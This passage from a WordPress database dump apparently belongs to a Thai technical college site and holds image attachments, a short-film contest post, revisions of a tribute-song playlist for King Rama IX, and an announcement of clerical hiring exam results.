(4506, 3, '2018-11-14 11:52:00', '2018-11-14 04:52:00', '', '89-Chanklang Kanthong copy', '', 'inherit', 'closed', 'closed', '', '89-chanklang-kanthong-copy', '', '', '2018-11-14 11:52:00', '2018-11-14 04:52:00', '', 4482, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/89-Chanklang-Kanthong-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4507, 3, '2018-11-14 11:52:16', '2018-11-14 04:52:16', '', '90-Chanklang Kanthong copy', '', 'inherit', 'closed', 'closed', '', '90-chanklang-kanthong-copy', '', '', '2018-11-14 11:52:16', '2018-11-14 04:52:16', '', 4482, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/90-Chanklang-Kanthong-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4508, 3, '2018-11-14 11:52:34', '2018-11-14 04:52:34', '', '94-Chanklang Kanthong copy', '', 'inherit', 'closed', 'closed', '', '94-chanklang-kanthong-copy', '', '', '2018-11-14 11:52:34', '2018-11-14 04:52:34', '', 4482, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/94-Chanklang-Kanthong-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4509, 3, '2018-11-14 11:52:52', '2018-11-14 04:52:52', '', '98-Chanklang Kanthong copy', '', 'inherit', 'closed', 'closed', '', '98-chanklang-kanthong-copy', '', '', '2018-11-14 11:52:52', '2018-11-14 04:52:52', '', 4482, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/98-Chanklang-Kanthong-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4510, 3, '2018-11-14 11:53:06', '2018-11-14 04:53:06', '', '99-Chanklang Kanthong copy', '', 'inherit', 'closed', 'closed', '', '99-chanklang-kanthong-copy', '', '', '2018-11-14 11:53:06', '2018-11-14 04:53:06', '', 4482, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/99-Chanklang-Kanthong-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4511, 3, '2018-11-14 12:48:23', '2018-11-14 05:48:23', 'https://youtu.be/GwqyX1Gk5N0\r\n\r\nhttps://youtu.be/T10s06PGMHI\r\n\r\n \r\n\r\n ', 'ประกวดหนังสั้น \"อาชีวะทำดีเพื่อพ่อ\"', '', 'inherit', 'closed', 'closed', '', '4478-revision-v1', '', '', '2018-11-14 12:48:23', '2018-11-14 05:48:23', '', 4478, 'http://www.technicrayong.ac.th/4478-revision-v1/', 0, 'revision', '', 0),
(4513, 3, '2018-11-15 09:18:38', '2018-11-15 02:18:38', '<h3><em><span style=\"color: #993300;\">Play Lists</span></em></h3>\r\n<ol>\r\n <li>13ตุลา-หนุ่ย <em><span style=\"color: #ff0000;\">00:01</span></em></li>\r\n <li>Airborne - บทเพลงถึงพ่อ 04:11</li>\r\n <li>black sheep-lecture building</li>\r\n <li>Blossoms Blooming-Secret Sessions</li>\r\n <li>inner happiness-mama say yes</li>\r\n <li>Long live in my heart - Deep O Seas</li>\r\n <li>OH Pra Keun Srung -Kru Pum Final</li>\r\n <li>Rapbit Dolls - นักวิทยาศาสตร์โลกล้านปี</li>\r\n <li>Run - My Daddy is BEST ft. p-hot</li>\r\n <li>Time will tell - หัวใจพ่อ</li>\r\n <li>walk like dad-Stereogram</li>\r\n <li>Yellow Duck! - Paul</li>\r\n <li>ขอให้พ่อได้คลายกังวล-white whisky</li>\r\n <li>คำของพ่อ</li>\r\n <li>คำ\'ฉันรักพ่อ\' เอ้-วรวัฒน์ ศรีจรัส</li>\r\n <li>คำสอนจากพ่อ-หนึ่ง ตีสิบ</li>\r\n <li>คิดถึงพ่อ ขอทำดี-แมน ฐนพล จำปาไทย</li>\r\n <li>คิดถึงพ่อ-Bluedock Final</li>\r\n <li>จงเป็นหนึ่งเดียว</li>\r\n <li>จากใต้ฝ่าละอองธุลี - พงษ์ บาติก</li>\r\n <li>ใจบริสุทธิ์-Never mind</li>\r\n <li>แด่รัชกาลที่ ๙ - MYDAY</li>\r\n <li>ตามรอยคำพ่อสอน-AUTOPiLOT Ft.ป้อง สราวุธ</li>\r\n <li>ท่านที่เรารัก-สารฑูร กฤตติกากุล</li>\r\n <li>เทคโนโลดี-BAY BAY BROTHERS Feat. Sci-fi barber</li>\r\n <li>แทนคุณแผ่นดิน-นักดนตรีมุมตึก</li>\r\n <li>ไทใหญ่รักในหลวง-กลุ่มเยาวชนไทใหญ่</li>\r\n <li>ปฏิญาณ-Weekend Rocker</li>\r\n <li>ปณิธานของลูก-ทีมงานเดอะเพ้อเจอร์</li>\r\n <li>ฝันบิดา-ชาติ สุชาติ</li>\r\n <li>ฝึกใจ(Song - for king)-The Catwalk</li>\r\n <li>พ่อบนฟ้า-เดอะ คุโรบูตะ</li>\r\n <li>พ่อผู้มีแต่ให้-(รวมนักดนตรีนวนคร)</li>\r\n <li>พอมีพอกิน-Kee Khumsaeng</li>\r\n <li>พ่อหลวงของปวงชนฯ-เฟรนด์อาบี</li>\r\n <li>พ่อหลวงในดวงใจ....นิรันดร์-ฟอร์ด สบชัย ไกรยูรเสน</li>\r\n <li>พ่อแห่งแผ่นดิน-จิระยุทธ จิระธนวิทย์</li>\r\n <li>เพลง13ตุลา2559 ใจแตกสลาย ขอเป็นข้ารองพระบาททุกชาติไป-สาธิต จ้อยเจริญ</li>\r\n <li>เพลงของพ่อ-วรัตถ์ชัย</li>\r\n <li>เพลงคือราชา พงษ์ บาติก</li>\r\n <li>ภาพที่เคยมีพ่อ-รวมศิลปินดงงู</li>\r\n <li>ภาพในหัวใจ - รวมศิลปิน</li>\r\n <li>มองฟ้าเวลาคิดถึง-100วันแห่งความคิดถึง Kpn Sarincity Samutsakhon</li>\r\n <li>มิใช่อ่อนแออ-สมัยไหนนิยม</li>\r\n <li>เมื่อพ่อกลับไปบนฟ้า</li>\r\n <li>ยาวิเศษจากฟ้า-Recordng studo by Sabudchai Studio</li>\r\n <li>รอยเท้า ที่พ่อเดิน-พลายงาม</li>\r\n <li>รอยเท้าพ่อ-ใบไม้สีแดง</li>\r\n <li>ระหว่างทาง -Black Tree</li>\r\n <li>รักพ่อ - BAD DNA</li>\r\n <li>เรือนจำพิเศษมีนบุรีประสายเสียง - Live and Learn</li>\r\n <li>เรือนจำพิเศษมีนบุรีประสายเสียง - รักพ่อต้องรักกัน</li>\r\n <li>เรือนจำพิเศษมีนบุรีประสายเสียง - ศรัทธา</li>\r\n <li>เรือนจำพิเศษมีนบุรีประสายเสียง[เพลงพระราชนิพนธ์] - ชะตาชีวิต</li>\r\n <li>เรือนจำพิเศษมีนบุรีประสายเสียง[เพลงพระราชนิพนธ์] - บัวขาว</li>\r\n <li>เรือนจำพิเศษมีนบุรีประสายเสียง[เพลงพระราชนิพนธ์] - สายฝน</li>\r\n <li>ศรัทธา-Past of the pain</li>\r\n <li>สมัยไหนนิยม เพลง มิใช่อ่อนแออ</li>\r\n <li>สัตว์ป่า - BABYLON BK</li>\r\n <li>สิงโต นำโชค - รักเพื่อพ่อ</li>\r\n <li>สุดท้ายคือรางวัล จากผ่านภพ-เฉลิมบัวทิพย์ ไทยเเลน์กอต</li>\r\n <li>หน้าที่ของตน-หนึ่ง smile buffalo</li>\r\n <li>ห่างไกล ใจยังห่วง-CobraK</li>\r\n <li>ให้คงอยู่-Sao Moonlight Gypsy</li>\r\n <li>อยากให้พ่อกลับมา-นายเสียง ประตูเปิด</li>\r\n <li>โอ้พระคืนสรวง [Rock Version] - แตงโม Lost Ferrari</li>\r\n <li>โอ้พระคืนสรวง-CU Chorus</li>\r\n</ol>', '\"แต่งเพลงเพื่อพ่อ\"', '', 'inherit', 'closed', 'closed', '', '4473-revision-v1', '', '', '2018-11-15 09:18:38', '2018-11-15 02:18:38', '', 4473, 'http://www.technicrayong.ac.th/4473-revision-v1/', 0, 'revision', '', 0),
(4514, 3, '2018-11-15 09:42:48', '2018-11-15 02:42:48', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F11%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%9C%E0%B8%A5%E0%B8%AA%E0%B8%AD%E0%B8%9A%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B9%80%E0%B8%9B%E0%B9%87%E0%B8%99%E0%B8%A5%E0%B8%B9%E0%B8%81%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87%E0%B8%8A%E0%B8%B1%E0%B9%88%E0%B8%A7%E0%B8%84%E0%B8%A3%E0%B8%B2%E0%B8%A7-%E0%B8%97%E0%B8%B3%E0%B8%AB%E0%B8%99%E0%B9%89%E0%B8%B2%E0%B8%97%E0%B8%B5%E0%B9%88%E0%B8%98%E0%B8%B8%E0%B8%A3%E0%B8%81%E0%B8%B2%E0%B8%A3-%E0%B8%88%E0%B8%B3%E0%B8%99%E0%B8%A7%E0%B8%99-%E0%B9%93-%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ผลสอบคัดเลือกเป็นลูกจ้างชั่วคราว ทำหน้าที่ธุรการ จำนวน ๓ อัตรา', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%9c%e0%b8%a5%e0%b8%aa%e0%b8%ad%e0%b8%9a%e0%b8%84%e0%b8%b1%e0%b8%94%e0%b9%80%e0%b8%a5%e0%b8%b7%e0%b8%ad%e0%b8%81%e0%b9%80%e0%b8%9b-2', '', '', '2018-11-15 09:42:48', '2018-11-15 02:42:48', '', 0, 'http://www.technicrayong.ac.th/?p=4514', 247, 'post', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(4515, 3, '2018-11-15 09:29:22', '2018-11-15 02:29:22', '<h3><em><span style=\"color: #993300;\">Play Lists</span></em></h3>\r\n<ol>\r\n <li>13ตุลา-หนุ่ย <em><span style=\"color: #ff0000;\">00:01</span></em></li>\r\n <li>Airborne - บทเพลงถึงพ่อ 04:11</li>\r\n <li>black sheep-lecture building 08:32</li>\r\n <li>Blossoms Blooming-Secret Sessions</li>\r\n <li>inner happiness-mama say yes</li>\r\n <li>Long live in my heart - Deep O Seas</li>\r\n <li>OH Pra Keun Srung -Kru Pum Final</li>\r\n <li>Rapbit Dolls - นักวิทยาศาสตร์โลกล้านปี</li>\r\n <li>Run - My Daddy is BEST ft. p-hot</li>\r\n <li>Time will tell - หัวใจพ่อ</li>\r\n <li>walk like dad-Stereogram</li>\r\n <li>Yellow Duck! - Paul</li>\r\n <li>ขอให้พ่อได้คลายกังวล-white whisky</li>\r\n <li>คำของพ่อ</li>\r\n <li>คำ\'ฉันรักพ่อ\' เอ้-วรวัฒน์ ศรีจรัส</li>\r\n <li>คำสอนจากพ่อ-หนึ่ง ตีสิบ</li>\r\n <li>คิดถึงพ่อ ขอทำดี-แมน ฐนพล จำปาไทย</li>\r\n <li>คิดถึงพ่อ-Bluedock Final</li>\r\n <li>จงเป็นหนึ่งเดียว</li>\r\n <li>จากใต้ฝ่าละอองธุลี - พงษ์ บาติก</li>\r\n <li>ใจบริสุทธิ์-Never mind</li>\r\n <li>แด่รัชกาลที่ ๙ - MYDAY</li>\r\n <li>ตามรอยคำพ่อสอน-AUTOPiLOT Ft.ป้อง สราวุธ</li>\r\n <li>ท่านที่เรารัก-สารฑูร กฤตติกากุล</li>\r\n <li>เทคโนโลดี-BAY BAY BROTHERS Feat. Sci-fi barber</li>\r\n <li>แทนคุณแผ่นดิน-นักดนตรีมุมตึก</li>\r\n <li>ไทใหญ่รักในหลวง-กลุ่มเยาวชนไทใหญ่</li>\r\n <li>ปฏิญาณ-Weekend Rocker</li>\r\n <li>ปณิธานของลูก-ทีมงานเดอะเพ้อเจอร์</li>\r\n <li>ฝันบิดา-ชาติ สุชาติ</li>\r\n <li>ฝึกใจ(Song - for king)-The Catwalk</li>\r\n <li>พ่อบนฟ้า-เดอะ คุโรบูตะ</li>\r\n <li>พ่อผู้มีแต่ให้-(รวมนักดนตรีนวนคร)</li>\r\n <li>พอมีพอกิน-Kee Khumsaeng</li>\r\n <li>พ่อหลวงของปวงชนฯ-เฟรนด์อาบี</li>\r\n <li>พ่อหลวงในดวงใจ....นิรันดร์-ฟอร์ด สบชัย ไกรยูรเสน</li>\r\n <li>พ่อแห่งแผ่นดิน-จิระยุทธ จิระธนวิทย์</li>\r\n <li>เพลง13ตุลา2559 ใจแตกสลาย ขอเป็นข้ารองพระบาททุกชาติไป-สาธิต จ้อยเจริญ</li>\r\n <li>เพลงของพ่อ-วรัตถ์ชัย</li>\r\n <li>เพลงคือราชา พงษ์ บาติก</li>\r\n <li>ภาพที่เคยมีพ่อ-รวมศิลปินดงงู</li>\r\n <li>ภาพในหัวใจ - รวมศิลปิน</li>\r\n <li>มองฟ้าเวลาคิดถึง-100วันแห่งความคิดถึง Kpn Sarincity Samutsakhon</li>\r\n <li>มิใช่อ่อนแออ-สมัยไหนนิยม</li>\r\n <li>เมื่อพ่อกลับไปบนฟ้า</li>\r\n <li>ยาวิเศษจากฟ้า-Recordng studo by Sabudchai Studio</li>\r\n <li>รอยเท้า ที่พ่อเดิน-พลายงาม</li>\r\n <li>รอยเท้าพ่อ-ใบไม้สีแดง</li>\r\n <li>ระหว่างทาง -Black Tree</li>\r\n <li>รักพ่อ - BAD DNA</li>\r\n <li>เรือนจำพิเศษมีนบุรีประสายเสียง - Live and Learn</li>\r\n <li>เรือนจำพิเศษมีนบุรีประสายเสียง - รักพ่อต้องรักกัน</li>\r\n <li>เรือนจำพิเศษมีนบุรีประสายเสียง - ศรัทธา</li>\r\n <li>เรือนจำพิเศษมีนบุรีประสายเสียง[เพลงพระราชนิพนธ์] - ชะตาชีวิต</li>\r\n <li>เรือนจำพิเศษมีนบุรีประสายเสียง[เพลงพระราชนิพนธ์] - บัวขาว</li>\r\n <li>เรือนจำพิเศษมีนบุรีประสายเสียง[เพลงพระราชนิพนธ์] - สายฝน</li>\r\n <li>ศรัทธา-Past of the pain</li>\r\n <li>สมัยไหนนิยม เพลง มิใช่อ่อนแออ</li>\r\n <li>สัตว์ป่า - BABYLON BK</li>\r\n <li>สิงโต นำโชค - รักเพื่อพ่อ</li>\r\n <li>สุดท้ายคือรางวัล จากผ่านภพ-เฉลิมบัวทิพย์ ไทยเเลน์กอต</li>\r\n <li>หน้าที่ของตน-หนึ่ง smile buffalo</li>\r\n <li>ห่างไกล ใจยังห่วง-CobraK</li>\r\n <li>ให้คงอยู่-Sao Moonlight Gypsy</li>\r\n <li>อยากให้พ่อกลับมา-นายเสียง ประตูเปิด</li>\r\n <li>โอ้พระคืนสรวง [Rock Version] - แตงโม Lost Ferrari</li>\r\n <li>โอ้พระคืนสรวง-CU Chorus</li>\r\n</ol>', '\"แต่งเพลงเพื่อพ่อ\"', '', 'inherit', 'closed', 'closed', '', '4473-revision-v1', '', '', '2018-11-15 09:29:22', '2018-11-15 02:29:22', '', 4473, 'http://www.technicrayong.ac.th/4473-revision-v1/', 0, 'revision', '', 0),
(4516, 3, '2018-11-15 09:42:30', '2018-11-15 02:42:30', '', 'ประกาศ ผลสอบคัดเลือกเป็นลูกจ้างชั่วคราว ทำหน้าที่ธุรการ จำนวน ๓ อัตรา', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%9c%e0%b8%a5%e0%b8%aa%e0%b8%ad%e0%b8%9a%e0%b8%84%e0%b8%b1%e0%b8%94%e0%b9%80%e0%b8%a5%e0%b8%b7%e0%b8%ad%e0%b8%81%e0%b9%80%e0%b8%9b-2', '', '', '2018-11-15 09:42:30', '2018-11-15 02:42:30', '', 4514, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/ประกาศ-ผลสอบคัดเลือกเป็นลูกจ้างชั่วคราว-ทำหน้าที่ธุรการ-จำนวน-๓-อัตรา.pdf', 0, 'attachment', 'application/pdf', 0),
(4517, 3, '2018-11-15 09:42:48', '2018-11-15 02:42:48', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F11%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%9C%E0%B8%A5%E0%B8%AA%E0%B8%AD%E0%B8%9A%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B9%80%E0%B8%9B%E0%B9%87%E0%B8%99%E0%B8%A5%E0%B8%B9%E0%B8%81%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87%E0%B8%8A%E0%B8%B1%E0%B9%88%E0%B8%A7%E0%B8%84%E0%B8%A3%E0%B8%B2%E0%B8%A7-%E0%B8%97%E0%B8%B3%E0%B8%AB%E0%B8%99%E0%B9%89%E0%B8%B2%E0%B8%97%E0%B8%B5%E0%B9%88%E0%B8%98%E0%B8%B8%E0%B8%A3%E0%B8%81%E0%B8%B2%E0%B8%A3-%E0%B8%88%E0%B8%B3%E0%B8%99%E0%B8%A7%E0%B8%99-%E0%B9%93-%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ผลสอบคัดเลือกเป็นลูกจ้างชั่วคราว ทำหน้าที่ธุรการ จำนวน ๓ อัตรา', '', 'inherit', 'closed', 'closed', '', '4514-revision-v1', '', '', '2018-11-15 09:42:48', '2018-11-15 02:42:48', '', 4514, 'http://www.technicrayong.ac.th/4514-revision-v1/', 0, 'revision', '', 0),
(4518, 3, '2018-11-15 09:52:17', '2018-11-15 02:52:17', '<h3><em><span style=\"color: #993300;\">Play Lists</span></em></h3>\r\n<ol>\r\n <li>13ตุลา-หนุ่ย <em><span style=\"color: #ff0000;\">00:01</span></em></li>\r\n <li>Airborne - บทเพลงถึงพ่อ 04:11</li>\r\n <li>black sheep-lecture building 08:32</li>\r\n <li>Blossoms Blooming-Secret Sessions 10:46</li>\r\n <li>inner happiness-mama say yes 17:54</li>\r\n <li>Long live in my heart - Deep O Seas 20:41</li>\r\n <li>OH Pra Keun Srung -Kru Pum Final 25:25</li>\r\n <li>Rapbit Dolls - นักวิทยาศาสตร์โลกล้านปี 29:26</li>\r\n <li>Run - My Daddy is BEST ft. p-hot 34:11</li>\r\n <li>Time will tell - หัวใจพ่อ 37:57</li>\r\n <li>walk like dad-Stereogram 42:45</li>\r\n <li>Yellow Duck! - Paul 46:06</li>\r\n <li>ขอให้พ่อได้คลายกังวล-white whisky 48:30</li>\r\n <li>คำของพ่อ 53:55</li>\r\n <li>คำ\'ฉันรักพ่อ\' เอ้-วรวัฒน์ ศรีจรัส 57:39</li>\r\n <li>คำสอนจากพ่อ-หนึ่ง ตีสิบ 01:02:45</li>\r\n <li>คิดถึงพ่อ ขอทำดี-แมน ฐนพล จำปาไทย 01:07:40</li>\r\n <li>คิดถึงพ่อ-Bluedock Final 01:12:08</li>\r\n <li>จงเป็นหนึ่งเดียว 01:15:41</li>\r\n <li>จากใต้ฝ่าละอองธุลี - พงษ์ บาติก 01:18:13</li>\r\n <li>ใจบริสุทธิ์-Never mind</li>\r\n <li>แด่รัชกาลที่ ๙ - MYDAY</li>\r\n <li>ตามรอยคำพ่อสอน-AUTOPiLOT Ft.ป้อง สราวุธ</li>\r\n <li>ท่านที่เรารัก-สารฑูร กฤตติกากุล</li>\r\n <li>เทคโนโลดี-BAY BAY BROTHERS Feat. Sci-fi barber</li>\r\n <li>แทนคุณแผ่นดิน-นักดนตรีมุมตึก</li>\r\n <li>ไทใหญ่รักในหลวง-กลุ่มเยาวชนไทใหญ่</li>\r\n <li>ปฏิญาณ-Weekend Rocker</li>\r\n <li>ปณิธานของลูก-ทีมงานเดอะเพ้อเจอร์</li>\r\n <li>ฝันบิดา-ชาติ สุชาติ</li>\r\n <li>ฝึกใจ(Song - for king)-The Catwalk</li>\r\n <li>พ่อบนฟ้า-เดอะ คุโรบูตะ</li>\r\n <li>พ่อผู้มีแต่ให้-(รวมนักดนตรีนวนคร)</li>\r\n <li>พอมีพอกิน-Kee Khumsaeng</li>\r\n <li>พ่อหลวงของปวงชนฯ-เฟรนด์อาบี</li>\r\n <li>พ่อหลวงในดวงใจ....นิรันดร์-ฟอร์ด สบชัย ไกรยูรเสน</li>\r\n <li>พ่อแห่งแผ่นดิน-จิระยุทธ จิระธนวิทย์</li>\r\n <li>เพลง13ตุลา2559 ใจแตกสลาย ขอเป็นข้ารองพระบาททุกชาติไป-สาธิต จ้อยเจริญ</li>\r\n <li>เพลงของพ่อ-วรัตถ์ชัย</li>\r\n <li>เพลงคือราชา พงษ์ บาติก</li>\r\n <li>ภาพที่เคยมีพ่อ-รวมศิลปินดงงู</li>\r\n <li>ภาพในหัวใจ - รวมศิลปิน</li>\r\n <li>มองฟ้าเวลาคิดถึง-100วันแห่งความคิดถึง Kpn Sarincity Samutsakhon</li>\r\n <li>มิใช่อ่อนแออ-สมัยไหนนิยม</li>\r\n <li>เมื่อพ่อกลับไปบนฟ้า</li>\r\n <li>ยาวิเศษจากฟ้า-Recordng studo by Sabudchai Studio</li>\r\n <li>รอยเท้า ที่พ่อเดิน-พลายงาม</li>\r\n <li>รอยเท้าพ่อ-ใบไม้สีแดง</li>\r\n <li>ระหว่างทาง -Black Tree</li>\r\n <li>รักพ่อ - BAD DNA</li>\r\n <li>เรือนจำพิเศษมีนบุรีประสายเสียง - Live and Learn</li>\r\n <li>เรือนจำพิเศษมีนบุรีประสายเสียง - รักพ่อต้องรักกัน</li>\r\n <li>เรือนจำพิเศษมีนบุรีประสายเสียง - ศรัทธา</li>\r\n <li>เรือนจำพิเศษมีนบุรีประสายเสียง[เพลงพระราชนิพนธ์] - ชะตาชีวิต</li>\r\n <li>เรือนจำพิเศษมีนบุรีประสายเสียง[เพลงพระราชนิพนธ์] - บัวขาว</li>\r\n <li>เรือนจำพิเศษมีนบุรีประสายเสียง[เพลงพระราชนิพนธ์] - สายฝน</li>\r\n <li>ศรัทธา-Past of the pain</li>\r\n <li>สมัยไหนนิยม เพลง มิใช่อ่อนแออ</li>\r\n <li>สัตว์ป่า - BABYLON BK</li>\r\n <li>สิงโต นำโชค - รักเพื่อพ่อ</li>\r\n <li>สุดท้ายคือรางวัล จากผ่านภพ-เฉลิมบัวทิพย์ ไทยเเลน์กอต</li>\r\n <li>หน้าที่ของตน-หนึ่ง smile buffalo</li>\r\n <li>ห่างไกล ใจยังห่วง-CobraK</li>\r\n <li>ให้คงอยู่-Sao Moonlight Gypsy</li>\r\n <li>อยากให้พ่อกลับมา-นายเสียง ประตูเปิด</li>\r\n <li>โอ้พระคืนสรวง [Rock Version] - แตงโม Lost Ferrari</li>\r\n <li>โอ้พระคืนสรวง-CU Chorus</li>\r\n</ol>', '\"แต่งเพลงเพื่อพ่อ\"', '', 'inherit', 'closed', 'closed', '', '4473-revision-v1', '', '', '2018-11-15 09:52:17', '2018-11-15 02:52:17', '', 4473, 'http://www.technicrayong.ac.th/4473-revision-v1/', 0, 'revision', '', 0),
(4519, 3, '2018-11-15 10:21:23', '2018-11-15 03:21:23', '<h3><em><span style=\"color: #993300;\">Play Lists</span></em></h3>\r\n<ol>\r\n <li>13ตุลา-หนุ่ย <em><span style=\"color: #ff0000;\">00:01</span></em></li>\r\n <li>Airborne - บทเพลงถึงพ่อ 04:11</li>\r\n <li>black sheep-lecture building 08:32</li>\r\n <li>Blossoms Blooming-Secret Sessions 10:46</li>\r\n <li>inner happiness-mama say yes 17:54</li>\r\n <li>Long live in my heart - Deep O Seas 20:41</li>\r\n <li>OH Pra Keun Srung -Kru Pum Final 25:25</li>\r\n <li>Rapbit Dolls - นักวิทยาศาสตร์โลกล้านปี 29:26</li>\r\n <li>Run - My Daddy is BEST ft. p-hot 34:11</li>\r\n <li>Time will tell - หัวใจพ่อ 37:57</li>\r\n <li>walk like dad-Stereogram 42:45</li>\r\n <li>Yellow Duck! - Paul 46:06</li>\r\n <li>ขอให้พ่อได้คลายกังวล-white whisky 48:30</li>\r\n <li>คำของพ่อ 53:55</li>\r\n <li>คำ\'ฉันรักพ่อ\' เอ้-วรวัฒน์ ศรีจรัส 57:39</li>\r\n <li>คำสอนจากพ่อ-หนึ่ง ตีสิบ 01:02:45</li>\r\n <li>คิดถึงพ่อ ขอทำดี-แมน ฐนพล จำปาไทย 01:07:40</li>\r\n <li>คิดถึงพ่อ-Bluedock Final 01:12:08</li>\r\n <li>จงเป็นหนึ่งเดียว 01:15:41</li>\r\n <li>จากใต้ฝ่าละอองธุลี - พงษ์ บาติก 01:18:13</li>\r\n <li>ใจบริสุทธิ์-Never mind 01:22:16</li>\r\n <li>แด่รัชกาลที่ ๙ - MYDAY 01:26:11</li>\r\n <li>ตามรอยคำพ่อสอน-AUTOPiLOT Ft.ป้อง สราวุธ 01:30:13</li>\r\n <li>ท่านที่เรารัก-สารฑูร กฤตติกากุล 1:36:06</li>\r\n <li>เทคโนโลดี-BAY BAY BROTHERS Feat. Sci-fi barber 01:42:52</li>\r\n <li>แทนคุณแผ่นดิน-นักดนตรีมุมตึก 01:46:51</li>\r\n <li>ไทใหญ่รักในหลวง-กลุ่มเยาวชนไทใหญ่ 01:49:52</li>\r\n <li>ปฏิญาณ-Weekend Rocker 01:53:32</li>\r\n <li>ปณิธานของลูก-ทีมงานเดอะเพ้อเจอร์ 01:57:56</li>\r\n <li>ฝันบิดา-ชาติ สุชาติ 02:04:10</li>\r\n <li>ฝึกใจ(Song - for king)-The Catwalk 02:08:55</li>\r\n <li>พ่อบนฟ้า-เดอะ คุโรบูตะ 02:13:20</li>\r\n <li>พ่อผู้มีแต่ให้-(รวมนักดนตรีนวนคร) 02:15:40</li>\r\n <li>พอมีพอกิน-Kee Khumsaeng 02:21:01</li>\r\n <li>พ่อหลวงของปวงชนฯ-เฟรนด์อาบี 02:25:06</li>\r\n <li>พ่อหลวงในดวงใจ....นิรันดร์-ฟอร์ด สบชัย ไกรยูรเสน 02:30:13</li>\r\n <li>พ่อแห่งแผ่นดิน-จิระยุทธ จิระธนวิทย์ 02:36:09</li>\r\n <li>เพลง13ตุลา2559 ใจแตกสลาย ขอเป็นข้ารองพระบาททุกชาติไป-สาธิต จ้อยเจริญ 02:41:02</li>\r\n <li>เพลงของพ่อ-วรัตถ์ชัย 02:45:56</li>\r\n <li>เพลงคือราชา พงษ์ บาติก 02:51:03</li>\r\n <li>ภาพที่เคยมีพ่อ-รวมศิลปินดงงู 02:54:53</li>\r\n <li>ภาพในหัวใจ - รวมศิลปิน 02:58:51</li>\r\n <li>มองฟ้าเวลาคิดถึง-100วันแห่งความคิดถึง Kpn Sarincity Samutsakhon 03:04:12</li>\r\n <li>มิใช่อ่อนแออ-สมัยไหนนิยม 03:08:01</li>\r\n <li>เมื่อพ่อกลับไปบนฟ้า 03:12:20</li>\r\n <li>ยาวิเศษจากฟ้า-Recordng studo by Sabudchai Studio 03:15:59</li>\r\n <li>รอยเท้า ที่พ่อเดิน-พลายงาม 03:19:26</li>\r\n <li>รอยเท้าพ่อ-ใบไม้สีแดง 03:23:45</li>\r\n <li>ระหว่างทาง -Black Tree 03:27:17</li>\r\n <li>รักพ่อ - BAD DNA 03:32:18</li>\r\n <li>เรือนจำพิเศษมีนบุรีประสายเสียง - Live and Learn 03:35:47</li>\r\n <li>เรือนจำพิเศษมีนบุรีประสายเสียง - รักพ่อต้องรักกัน 03:39:18</li>\r\n <li>เรือนจำพิเศษมีนบุรีประสายเสียง - ศรัทธา 03:43:19</li>\r\n <li>เรือนจำพิเศษมีนบุรีประสายเสียง[เพลงพระราชนิพนธ์] - ชะตาชีวิต 03:47:33</li>\r\n <li>เรือนจำพิเศษมีนบุรีประสายเสียง[เพลงพระราชนิพนธ์] - บัวขาว 03:49:59</li>\r\n <li>เรือนจำพิเศษมีนบุรีประสายเสียง[เพลงพระราชนิพนธ์] - สายฝน 03:53:55</li>\r\n <li>ศรัทธา-Past of the pain 03:56:52</li>\r\n <li>สมัยไหนนิยม เพลง มิใช่อ่อนแอ 04:03:32</li>\r\n <li>สัตว์ป่า - BABYLON BK 04:07:50</li>\r\n <li>สิงโต นำโชค - รักเพื่อพ่อ 04:09:39</li>\r\n <li>สุดท้ายคือรางวัล จากผ่านภพ-เฉลิมบัวทิพย์ ไทยเเลน์กอต 04:12:52</li>\r\n <li>หน้าที่ของตน-หนึ่ง smile buffalo 04:15:34</li>\r\n <li>ห่างไกล ใจยังห่วง-CobraK 04:20:07</li>\r\n <li>ให้คงอยู่-Sao Moonlight Gypsy 04:22:13</li>\r\n <li>อยากให้พ่อกลับมา-นายเสียง ประตูเปิด 04:25:57</li>\r\n <li>โอ้พระคืนสรวง [Rock Version] - แตงโม Lost Ferrari 04:29:55</li>\r\n <li>โอ้พระคืนสรวง-CU Chorus 04:33:32</li>\r\n</ol>', '\"แต่งเพลงเพื่อพ่อ\"', '', 'inherit', 'closed', 'closed', '', '4473-revision-v1', '', '', '2018-11-15 10:21:23', '2018-11-15 03:21:23', '', 4473, 'http://www.technicrayong.ac.th/4473-revision-v1/', 0, 'revision', '', 0),
